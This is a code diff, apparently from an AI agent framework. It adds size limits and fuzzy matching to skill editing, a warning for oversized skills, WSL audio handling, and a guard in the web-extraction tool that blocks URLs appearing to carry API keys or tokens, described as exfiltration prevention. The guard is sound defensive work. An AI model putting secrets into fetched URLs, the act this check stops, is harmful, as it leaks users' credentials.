    # Check for name collisions across all directories
    existing = _find_skill(name)
    if existing:
@@ -318,6 +339,10 @@ def _edit_skill(name: str, content: str) -> Dict[str, Any]:
    if err:
        return {"success": False, "error": err}

+    err = _validate_content_size(content)
+    if err:
+        return {"success": False, "error": err}
+
    existing = _find_skill(name)
    if not existing:
        return {"success": False, "error": f"Skill '{name}' not found. Use skills_list() to see available skills."}
@@ -379,27 +404,29 @@ def _patch_skill(

    content = target.read_text(encoding="utf-8")

-    count = content.count(old_string)
-    if count == 0:
+    # Use the same fuzzy matching engine as the file patch tool.
+    # This handles whitespace normalization, indentation differences,
+    # escape sequences, and block-anchor matching — saving the agent
+    # from exact-match failures on minor formatting mismatches.
+    from tools.fuzzy_match import fuzzy_find_and_replace
+
+    new_content, match_count, match_error = fuzzy_find_and_replace(
+        content, old_string, new_string, replace_all
+    )
+    if match_error:
        # Show a short preview of the file so the model can self-correct
        preview = content[:500] + ("..." if len(content) > 500 else "")
        return {
            "success": False,
-            "error": "old_string not found in the file.",
+            "error": match_error,
            "file_preview": preview,
        }

-    if count > 1 and not replace_all:
-        return {
-            "success": False,
-            "error": (
-                f"old_string matched {count} times. Provide more surrounding context "
-                f"to make the match unique, or set replace_all=true to replace all occurrences."
-            ),
-            "match_count": count,
-        }
-
-    new_content = content.replace(old_string, new_string) if replace_all else content.replace(old_string, new_string, 1)
+    # Check size limit on the result
+    target_label = "SKILL.md" if not file_path else file_path
+    err = _validate_content_size(new_content, label=target_label)
+    if err:
+        return {"success": False, "error": err}

    # If patching SKILL.md, validate frontmatter is still intact
    if not file_path:
@@ -419,10 +446,9 @@ def _patch_skill(
        _atomic_write_text(target, original_content)
        return {"success": False, "error": scan_error}

-    replacements = count if replace_all else 1
    return {
        "success": True,
-        "message": f"Patched {'SKILL.md' if not file_path else file_path} in skill '{name}' ({replacements} replacement{'s' if replacements > 1 else ''}).",
+        "message": f"Patched {'SKILL.md' if not file_path else file_path} in skill '{name}' ({match_count} replacement{'s' if match_count > 1 else ''}).",
    }


@@ -455,6 +481,21 @@ def _write_file(name: str, file_path: str, file_content: str) -> Dict[str, Any]:
    if not file_content and file_content != "":
        return {"success": False, "error": "file_content is required."}

+    # Check size limits
+    content_bytes = len(file_content.encode("utf-8"))
+    if content_bytes > MAX_SKILL_FILE_BYTES:
+        return {
+            "success": False,
+            "error": (
+                f"File content is {content_bytes:,} bytes "
+                f"(limit: {MAX_SKILL_FILE_BYTES:,} bytes / 1 MiB). "
+                f"Consider splitting into smaller files."
+            ),
+        }
+    err = _validate_content_size(file_content, label=file_path)
+    if err:
+        return {"success": False, "error": err}
+
    existing = _find_skill(name)
    if not existing:
        return {"success": False, "error": f"Skill '{name}' not found. Create it first with action='create'."}
--- a/tools/skills_hub.py
+++ b/tools/skills_hub.py
@@ -2115,7 +2115,11 @@ class OptionalSkillSource(SkillSource):
    """

    def __init__(self):
-        self._optional_dir = Path(__file__).parent.parent / "optional-skills"
+        from hermes_constants import get_optional_skills_dir
+
+        self._optional_dir = get_optional_skills_dir(
+            Path(__file__).parent.parent / "optional-skills"
+        )

    def source_id(self) -> str:
        return "official"
@@ -2521,6 +2525,22 @@ def install_from_quarantine(
    if install_dir.exists():
        shutil.rmtree(install_dir)

+    # Warn (but don't block) if SKILL.md is very large
+    skill_md = quarantine_path / "SKILL.md"
+    if skill_md.exists():
+        try:
+            skill_size = skill_md.stat().st_size
+            if skill_size > 100_000:
+                logger.warning(
+                    "Skill '%s' has a large SKILL.md (%s chars). "
+                    "Large skills consume significant context when loaded. "
+                    "Consider asking the author to split it into smaller files.",
+                    safe_skill_name,
+                    f"{skill_size:,}",
+                )
+        except OSError:
+            pass
+
    install_dir.parent.mkdir(parents=True, exist_ok=True)
    shutil.move(str(quarantine_path), str(install_dir))

--- a/tools/voice_mode.py
+++ b/tools/voice_mode.py
@@ -51,9 +51,12 @@ def _audio_available() -> bool:
 def detect_audio_environment() -> dict:
    """Detect if the current environment supports audio I/O.

-    Returns dict with 'available' (bool) and 'warnings' (list of strings).
+    Returns dict with 'available' (bool), 'warnings' (list of hard-fail
+    reasons that block voice mode), and 'notices' (list of informational
+    messages that do NOT block voice mode).
    """
-    warnings = []
+    warnings = []   # hard-fail: these block voice mode
+    notices = []     # informational: logged but don't block

    # SSH detection
    if any(os.environ.get(v) for v in ('SSH_CLIENT', 'SSH_TTY', 'SSH_CONNECTION')):
@@ -63,11 +66,20 @@ def detect_audio_environment() -> dict:
    if os.path.exists('/.dockerenv'):
        warnings.append("Running inside Docker container -- no audio devices")

-    # WSL detection
+    # WSL detection — PulseAudio bridge makes audio work in WSL.
+    # Only block if PULSE_SERVER is not configured.
    try:
        with open('/proc/version', 'r') as f:
            if 'microsoft' in f.read().lower():
-                warnings.append("Running in WSL -- audio requires PulseAudio bridge to Windows")
+                if os.environ.get('PULSE_SERVER'):
+                    notices.append("Running in WSL with PulseAudio bridge")
+                else:
+                    warnings.append(
+                        "Running in WSL -- audio requires PulseAudio bridge.\n"
+                        "  1. Set PULSE_SERVER=unix:/mnt/wslg/PulseServer\n"
+                        "  2. Create ~/.asoundrc pointing ALSA at PulseAudio\n"
+                        "  3. Verify with: arecord -d 3 /tmp/test.wav && aplay /tmp/test.wav"
+                    )
    except (FileNotFoundError, PermissionError, OSError):
        pass

@@ -79,7 +91,12 @@ def detect_audio_environment() -> dict:
            if not devices:
                warnings.append("No audio input/output devices detected")
        except Exception:
-            warnings.append("Audio subsystem error (PortAudio cannot query devices)")
+            # In WSL with PulseAudio, device queries can fail even though
+            # recording/playback works fine. Don't block if PULSE_SERVER is set.
+            if os.environ.get('PULSE_SERVER'):
+                notices.append("Audio device query failed but PULSE_SERVER is set -- continuing")
+            else:
+                warnings.append("Audio subsystem error (PortAudio cannot query devices)")
    except ImportError:
        warnings.append("Audio libraries not installed (pip install sounddevice numpy)")
    except OSError:
@@ -93,6 +110,7 @@ def detect_audio_environment() -> dict:
    return {
        "available": len(warnings) == 0,
        "warnings": warnings,
+        "notices": notices,
    }

 # ---------------------------------------------------------------------------
@@ -748,6 +766,8 @@ def check_voice_requirements() -> Dict[str, Any]:

    for warning in env_check["warnings"]:
        details_parts.append(f"Environment: {warning}")
+    for notice in env_check.get("notices", []):
+        details_parts.append(f"Environment: {notice}")

    return {
        "available": available,
--- a/tools/web_tools.py
+++ b/tools/web_tools.py
@@ -1130,24 +1130,26 @@ def web_search_tool(query: str, limit: int = 5) -> str:


 async def web_extract_tool(
-    urls: List[str], 
-    format: str = None, 
+    urls: List[str],
+    format: str = None,
    use_llm_processing: bool = True,
    model: Optional[str] = None,
    min_length: int = DEFAULT_MIN_LENGTH_FOR_SUMMARIZATION
 ) -> str:
    """
    Extract content from specific web pages using available extraction API backend.
-    
+
    This function provides a generic interface for web content extraction that
    can work with multiple backends. Currently uses Firecrawl.
-    
+
    Args:
        urls (List[str]): List of URLs to extract content from
        format (str): Desired output format ("markdown" or "html", optional)
        use_llm_processing (bool): Whether to process content with LLM for summarization (default: True)
        model (Optional[str]): The model to use for LLM processing (defaults to current auxiliary backend model)
        min_length (int): Minimum content length to trigger LLM processing (default: 5000)
+
+    Security: URLs are checked for embedded secrets before fetching.
    
    Returns:
        str: JSON string containing extracted content. If LLM processing is enabled and successful,
@@ -1156,6 +1158,16 @@ async def web_extract_tool(
    Raises:
        Exception: If extraction fails or API key is not set
    """
+    # Block URLs containing embedded secrets (exfiltration prevention)
+    from agent.redact import _PREFIX_RE
+    for _url in urls:
+        if _PREFIX_RE.search(_url):
+            return json.dumps({
+                "success": False,
+                "error": "Blocked: URL contains what appears to be an API key or token. "
+                         "Secrets must not be sent in URLs.",
+            })
+
    debug_call_data = {
        "parameters": {
            "urls": urls,